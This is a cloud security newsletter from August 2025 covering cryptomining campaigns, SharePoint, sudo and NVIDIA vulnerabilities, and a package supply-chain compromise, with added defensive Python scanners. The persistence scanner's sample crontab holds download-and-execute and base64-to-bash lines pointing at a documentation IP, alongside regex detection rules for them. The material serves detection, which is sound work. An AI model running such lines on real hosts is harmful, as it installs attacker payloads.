Crying Out Cloud - August 2025 Newsletter

August brought a wave of cloud security news - from major zero-days in SharePoint, NVIDIA, and sudo to cryptomining campaigns like Soco404. Explore key vulnerabilities, active exploits, and supply chain threats in this month’s Crying Out Cloud.

Welcome back! This month we've seen a lot of action, with both vulnerabilities and security incidents affecting users. We bring you the latest cloud security highlights to help you stay informed and stay secure. Let's dive in.


🔍 Highlights


Soco404 Cryptomining Campaign Exploits PostgreSQL and Cloud Misconfigurations

Wiz Research has uncovered Soco404, a sophisticated, multi-platform cryptomining campaign targeting cloud environments through exposed PostgreSQL instances, vulnerable Apache Tomcat servers, and other misconfigurations. The campaign delivers Linux and Windows payloads via fake 404 error pages with base64-encoded malware embedded in them, hosted on compromised or deceptive websites, including Google Sites and fraudulent crypto platforms. The attackers use a combination of obfuscated loaders, masquerading techniques, local socket communication, and persistence mechanisms such as cron jobs and shell profile modifications. On Windows, execution involves abuse of certutil, PowerShell, and system services, with payloads dropping additional miners and the WinRing0.sys driver. The operation appears to be part of a broader crypto-scam infrastructure, leveraging both social engineering and infrastructure compromise to sustain long-term mining activity.

Learn more in our blog ❯

Zero-Day Vulnerability in Microsoft SharePoint Exploited in the Wild

Two newly disclosed vulnerabilities in on-premises SharePoint Servers—CVE-2025-53770 (RCE, CVSS 9.8) and CVE-2025-53771 (auth bypass, CVSS 6.3)—have been chained in the ToolShell exploit to enable unauthenticated remote code execution. Both bypass earlier patches (for CVE-2025-49704 and CVE-2025-49706), prompting Microsoft to issue emergency updates after attackers discovered new exploitation paths. These flaws do not affect SharePoint Online.

According to Wiz data, when these vulnerabilities were first published, 9% of cloud environments had resources running vulnerable versions of self-managed SharePoint. After a few days of remediation efforts, that figure dropped to 5%.

Learn more in our blog ❯



🐞 High Profile Vulnerabilities


Critical Privilege Escalation in sudo

A set of vulnerabilities in sudo enables local attackers to escalate privileges, bypass host restrictions, and enumerate privileged users. The most severe, CVE-2025-32463, allows unprivileged users to gain root access via the --chroot flag combined with a malicious nsswitch.conf configuration.

Learn more here ❯


Critical Vulnerability in NVIDIA Container Toolkit

Wiz Research uncovered a critical vulnerability, CVE-2025-23266, in the widely used NVIDIA Container Toolkit and NVIDIA GPU Operator. The vulnerability allows attackers with control over a container image to escape the container and gain full access to the underlying host. Additionally, NVIDIA disclosed CVE-2025-23267, a high-severity vulnerability affecting the same version ranges of these products. It is strongly recommended to update to the latest version of both products (1.17.8 and 25.3.1, respectively), prioritizing container hosts that may run untrusted container images.

According to Wiz data, 37% of cloud environments have resources vulnerable to CVE-2025-23266.

Learn more in our blog ❯


Arbitrary File Write Vulnerability in Git

Git has patched CVE-2025-48384, a high-severity (CVSS 8.1) vulnerability affecting Git CLI on Linux and macOS. The flaw enables arbitrary file writes and potential remote code execution (RCE) when cloning weaponized repositories using the git clone --recursive command. GitHub Desktop for macOS is also vulnerable, and public proof-of-concept exploits are available, increasing the exploitation risk.

Learn more here ❯


AWS CodeBuild Vulnerability Allows Build Process Secrets Extraction


AWS has disclosed an issue in CodeBuild that was used to compromise the Amazon Q Developer Extension for Visual Studio. AWS CodeBuild is a service that runs build code in response to events on source code repositories, such as pull requests. The CodeBuild issue has been assigned CVE-2025-8217. It is recommended to ensure that no untrusted contributors are able to trigger CodeBuild build processes.

Learn more here ❯
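As an added illustration of the recommendation above (example code written for this newsletter, not AWS's or Wiz's own tooling): a check over CodeBuild project definitions that flags webhooks which start builds on pull-request events without restricting the actor. The project dicts below are constructed in the shape of a `batch_get_projects` response; the project names, account IDs and webhook URL are placeholders.

```python
from typing import Dict, List

# Pull-request events that anyone able to open a PR against the repo can produce.
PR_EVENTS = {"PULL_REQUEST_CREATED", "PULL_REQUEST_UPDATED", "PULL_REQUEST_REOPENED"}

# Constructed sample in the shape of `codebuild:BatchGetProjects` output
# (placeholder project names and account IDs, not real projects).
SAMPLE_PROJECTS = {
    "projects": [
        {   # fires on every PR, from any actor
            "name": "open-pr-builder",
            "webhook": {"filterGroups": [
                [{"type": "EVENT", "pattern": "PULL_REQUEST_CREATED, PULL_REQUEST_UPDATED"}],
            ]},
        },
        {   # fires only on pushes, which require write access to the repo
            "name": "push-only-builder",
            "webhook": {"filterGroups": [
                [{"type": "EVENT", "pattern": "PUSH"}],
            ]},
        },
        {   # fires on PRs, but only from allow-listed actor account IDs
            "name": "pr-allowlisted-builder",
            "webhook": {"filterGroups": [[
                {"type": "EVENT", "pattern": "PULL_REQUEST_CREATED"},
                {"type": "ACTOR_ACCOUNT_ID", "pattern": "^(12345678|87654321)$"},
            ]]},
        },
        {   # webhook with no filter groups at all (placeholder URL)
            "name": "unfiltered-webhook-builder",
            "webhook": {"url": "https://codebuild.example.invalid/webhook-placeholder"},
        },
        {   # no webhook: builds start manually or from a pipeline
            "name": "manual-builder",
        },
    ]
}


def group_allows_untrusted_pr_trigger(group: List[Dict]) -> bool:
    """A filter group fires when ALL its filters match. It is open to untrusted
    contributors if it matches a PR event and carries no ACTOR_ACCOUNT_ID
    allow-list filter (an exclude filter only denies some actors; it does not
    restrict who may trigger the build)."""
    events = set()
    actor_allowlisted = False
    for f in group:
        if f["type"] == "EVENT":
            events.update(e.strip() for e in f["pattern"].split(","))
        elif f["type"] == "ACTOR_ACCOUNT_ID" and not f.get("excludeMatchedPattern", False):
            actor_allowlisted = True
    return bool(events & PR_EVENTS) and not actor_allowlisted


def find_untrusted_triggerable_projects(response: Dict) -> List[str]:
    """Names of projects whose webhook can be fired by an untrusted PR author."""
    flagged = []
    for project in response.get("projects", []):
        webhook = project.get("webhook")
        if webhook is None:
            continue
        groups = webhook.get("filterGroups") or []
        # Assumption: a webhook with no filter groups is treated as firing on
        # every event, so it is flagged conservatively.
        if not groups or any(group_allows_untrusted_pr_trigger(g) for g in groups):
            flagged.append(project["name"])
    return flagged


if __name__ == "__main__":
    for name in find_untrusted_triggerable_projects(SAMPLE_PROJECTS):
        print(f"[!] {name}: pull-request webhook is triggerable by untrusted contributors")
```

To run this against real projects, pass the result of `boto3.client("codebuild").batch_get_projects(names=[...])` to `find_untrusted_triggerable_projects`. The check only looks at webhook filter groups; repository-side protections (who may open pull requests at all) are out of its scope.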



🔒 Security Incidents & Campaigns


Exposed JDWP Exploited in the Wild

Wiz Research discovered active exploitation of exposed Java Debug Wire Protocol (JDWP) interfaces, allowing attackers to gain remote code execution on misconfigured servers. In one case, a vulnerable TeamCity instance was compromised within hours, leading to the deployment of a stealthy, customized XMRig cryptominer disguised as the logrotate utility. The attacker used JDWP to inject commands, downloaded a dropper script (logservice.sh), and established persistence via cron jobs, systemd services, and shell startup files.

Learn more in our blog ❯
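Added example, not code from the original post or from Wiz: a check that walks JVM command lines and reports where a JDWP agent is listening on a non-loopback interface, the misconfiguration behind the exploitation described above. The process lines are constructed samples; paths and ports are placeholders.

```python
import re
from typing import Dict, List, Optional

# Constructed sample of `ps -eo args` output (not real process lines from the
# incident described above). Three JVMs carry a JDWP agent; one does not.
SAMPLE_PS_OUTPUT = """\
/usr/bin/java -agentlib:jdwp=transport=dt_socket,server=y,suspend=n,address=*:5005 -jar /opt/app/app.jar
/usr/bin/java -agentlib:jdwp=transport=dt_socket,server=y,suspend=n,address=127.0.0.1:5006 -jar /opt/other/other.jar
/usr/bin/java -Xrunjdwp:transport=dt_socket,server=y,suspend=n,address=8000 -cp /srv/tc TeamCityMain
/usr/bin/java -Xmx2g -jar /opt/plain/plain.jar
"""

# Both the modern (-agentlib:jdwp=...) and legacy (-Xrunjdwp:...) spellings.
JDWP_FLAG = re.compile(r"-(?:agentlib:jdwp=|Xrunjdwp:)(?P<opts>\S+)")

LOOPBACK_HOSTS = {"localhost", "127.0.0.1", "::1"}


def parse_jdwp_options(cmdline: str) -> Optional[Dict[str, str]]:
    """Return the JDWP key=value options from a JVM command line, or None."""
    m = JDWP_FLAG.search(cmdline)
    if not m:
        return None
    opts: Dict[str, str] = {}
    for item in m.group("opts").split(","):
        key, sep, value = item.partition("=")
        if sep:
            opts[key] = value
    return opts


def classify_address(address: str) -> str:
    """Classify a JDWP 'address' value by the interface it listens on.

    'exposed'   - wildcard or non-loopback host: reachable over the network
    'loopback'  - bound to localhost only
    'ambiguous' - bare port: JDK 9+ binds loopback, older JDKs bind all interfaces
    """
    host, sep, _port = address.rpartition(":")
    if not sep:
        return "ambiguous"
    host = host.strip("[]")
    if host in ("", "*", "0.0.0.0", "::"):
        return "exposed"
    if host in LOOPBACK_HOSTS:
        return "loopback"
    return "exposed"


def find_jdwp_listeners(ps_output: str) -> List[Dict[str, str]]:
    """Scan ps output and report every JVM that carries a JDWP agent."""
    findings = []
    for line in ps_output.splitlines():
        opts = parse_jdwp_options(line)
        if opts is None:
            continue
        address = opts.get("address", "")
        if opts.get("server", "n") != "y":
            verdict = "client"        # JVM dials out to a debugger; nothing listens
        elif address == "":
            verdict = "ambiguous"     # JDK picks a port; binding depends on JDK version
        else:
            verdict = classify_address(address)
        findings.append({
            "cmdline": line,
            "address": address,
            "port": address.rpartition(":")[2],
            "verdict": verdict,
        })
    return findings


if __name__ == "__main__":
    for f in find_jdwp_listeners(SAMPLE_PS_OUTPUT):
        if f["verdict"] != "loopback":
            print(f"[{f['verdict']}] port {f['port'] or '?'}: {f['cmdline']}")
```

Treat "ambiguous" results as exposed until the JDK version of that process is confirmed, and pair this host-side check with a network-side view (what is actually reachable through security groups or firewalls), since a loopback binding is only safe when nothing forwards the port.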


Linuxsys Cryptominer Campaign


The Linuxsys cryptominer has been part of a quiet but persistent campaign since 2021, exploiting known vulnerabilities like CVE-2021-41773. Attackers use compromised, legitimate websites to host payloads and configuration files, making detection difficult. A script (linux.sh) fetches the miner and installs persistence via a second script (cron.sh). Despite modest payouts, the operation continues across hundreds of infected machines.

Learn more here ❯
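The Soco404, exposed-JDWP and Linuxsys items all describe persistence through cron jobs, shell startup files, and binaries masquerading as system utilities such as logrotate. As an added example (written for this newsletter, not Wiz's detection logic), here is a small scanner that applies those traits as rules over collected crontab and shell-profile lines. The sample lines are constructed, 203.0.113.10 is a documentation address, and the rule set and utility names are illustrative choices rather than indicators from the reports.

```python
import re
from typing import Dict, List

# Constructed samples (not from the incidents described above): crontab
# entries and shell-profile lines, as collected from /etc/cron*, per-user
# crontabs and ~/.bashrc / ~/.profile. 203.0.113.10 is a documentation address.
SAMPLE_CRONTAB = """\
# m h dom mon dow command
0 3 * * * /usr/sbin/logrotate /etc/logrotate.conf
*/5 * * * * curl -s http://203.0.113.10/cron.sh | sh
@reboot /tmp/.x/logrotate -c /tmp/.x/config.json
30 2 * * * echo aGVsbG8gd29ybGQ= | base64 -d | bash
"""

SAMPLE_PROFILE = """\
# ~/.bashrc
export PATH=$HOME/bin:$PATH
alias ll='ls -alF'
nohup /dev/shm/.svc/linux.sh >/dev/null 2>&1 &
"""

# Regex rules, each a trait the campaigns above share in some form.
RULES = [
    ("download-and-execute", re.compile(r"\b(?:curl|wget)\b.*\|\s*(?:ba)?sh\b")),
    ("base64-decoded-command", re.compile(r"\bbase64\s+(?:-d|--decode)\b")),
    ("exec-from-tmp", re.compile(r"(?:^|[\s=])/(?:tmp|var/tmp|dev/shm)/")),
    ("hidden-directory", re.compile(r"/\.[^/\s]+/")),
]

# System utility names that malware borrows, and where the real ones live
# (illustrative set; extend it for your own baseline).
SYSTEM_NAMES = {"logrotate", "crond", "kworker", "sshd"}
SYSTEM_DIRS = {"/usr/sbin", "/usr/bin", "/sbin", "/bin"}


def lookalike_binaries(line: str) -> bool:
    """True if a token names a system utility but runs it from a non-system path."""
    for tok in line.split():
        tok = tok.strip("'\"")
        if "/" not in tok:
            continue
        directory, _, name = tok.rpartition("/")
        if name in SYSTEM_NAMES and directory not in SYSTEM_DIRS:
            return True
    return False


def scan_lines(source: str, text: str) -> List[Dict[str, object]]:
    """Return one finding per non-comment line that matches at least one rule."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), start=1):
        stripped = line.strip()
        if not stripped or stripped.startswith("#"):
            continue
        hits = [name for name, rx in RULES if rx.search(stripped)]
        if lookalike_binaries(stripped):
            hits.append("lookalike-system-binary")
        if hits:
            findings.append({"source": source, "lineno": lineno,
                             "line": stripped, "rules": hits})
    return findings


if __name__ == "__main__":
    for src, text in (("crontab", SAMPLE_CRONTAB), ("~/.bashrc", SAMPLE_PROFILE)):
        for f in scan_lines(src, text):
            print(f"{f['source']}:{f['lineno']} {','.join(f['rules'])}: {f['line']}")
```

The legitimate `/usr/sbin/logrotate` entry produces no finding, while the copy launched from a hidden directory under /tmp does; that contrast, rather than the file name alone, is what makes the masquerading technique in these campaigns detectable. Feed it real data by concatenating `crontab -l -u <user>` output, the files under /etc/cron.d, and each user's shell startup files; systemd unit files need a separate pass, since their `ExecStart=` lines follow a different syntax.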


UNC5174 Exploits Ivanti CSA Vulnerabilities in “Houken” Campaign


ANSSI has attributed a cyber campaign targeting multiple French sectors to the Houken intrusion set, linked to China-nexus threat actor UNC5174. This campaign exploited three zero-day vulnerabilities in Ivanti Cloud Service Appliance (CSA) — CVE-2024-8190, CVE-2024-8963, and CVE-2024-9380 — to gain initial access, deploy persistence mechanisms including a rootkit, and facilitate credential theft, lateral movement, cryptomining, and possible intelligence collection.

Learn more here ❯


Supply Chain Attack on npm and PyPI Packages via Maintainer Phishing


A targeted phishing attack led to the compromise of multiple popular npm and PyPI packages, including eslint-config-prettier, eslint-plugin-prettier, synckit, @pkgr/core, napi-postinstall, num2words, is, and got-fetch. The attacker stole the npm token of the packages' maintainer, enabling the publication of malicious versions that deliver malware to Windows systems during package installation.

Learn more here ❯



Hold on to your headphones!


Tune in to Crying Out Cloud, our monthly cloud security news roundup podcast! Hosted by the talented duo Eden Naftali and Amitai Cohen ✋

Listen on Spotify and Apple Podcasts